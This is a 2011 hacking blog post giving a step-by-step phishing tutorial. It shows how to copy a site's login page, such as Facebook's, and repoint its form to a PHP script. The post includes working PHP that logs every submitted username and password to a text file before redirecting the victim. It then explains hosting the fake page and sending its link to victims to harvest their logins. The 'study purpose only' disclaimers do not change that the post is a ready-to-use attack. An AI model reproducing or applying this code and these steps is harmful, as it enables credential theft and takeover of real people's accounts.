Posted by : Shekhar™
Thursday, 26 May 2011
Make Phisher - Hi friends, I hope you all are fine, After my previous article for "How to hack gmail account" I am again here with new Hacking Tutorial. I have been providing many Hack Accounts Tricks with the help of Phishing, But its the correct time for all of you to learn "How To Make Phisher" If you are regular visitor of Latest-Hackers.co.cc
Disclaimer : This article is for study purpose only. I want to make you aware how phishing is done . Please don't misuse this Knowledge. Don't "Hack Accounts" , its illegal. We are not responsible for any hack done by you..
Also read: "Hack Facebook Account With Smart Phishing" And "Hack Gmail Account With Smart Phishing"
Disclaimer : This article is for study purpose only. I want to make you aware how phishing is done . Please don't misuse this Knowledge. Don't "Hack Accounts" , its illegal. We are not responsible for any hack done by you..
Also read: "Hack Facebook Account With Smart Phishing" And "Hack Gmail Account With Smart Phishing"
Make Phisher Of Any Website To Hack Accounts
eg : Facebook.com2. Now do right click and save the page.
3. Open the page in notepad, Now search for "action = http://" and change following address to login.php
4. After editing save the page as "index.html"
5. Now its time to create login.php . Open notepad and copy/paste this below code and save it as login.php :
header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
6. Now create a simple and empty text file in notepad and save it as log.txt
7. Now create your own free web hosting account at my3gb.com and upload all the three files.
8. Upload Index.html , login.php , log.txt we created in above steps
9. We are done, our phisher / fake login page is ready
How to Hack Accounts ?
Send the index.html (the uploaded one) link to the victim , once he/she will enter the information and do login with our fake login page then every thing will be stored in log.txt, we can now open log.txt to see all the Login detailsIts very simple to create phisher of any website in the world, Here i have taken the example of Facebook Phisher . But in this same you can also create the phisher of many websites like yahoo, gmail, orkut, msn, etc
So friends, I hope you have enjoyed this Hacking Tricks, Its a part of hacking accounts, If you are facing any problem then please do share your feedback and problems, I am always here to help you out.
Related Posts :
- Back to Home »
- Internet Hacks »
- Make Phisher : Phishing Tutorial For Any Website | How To Hack Accounts


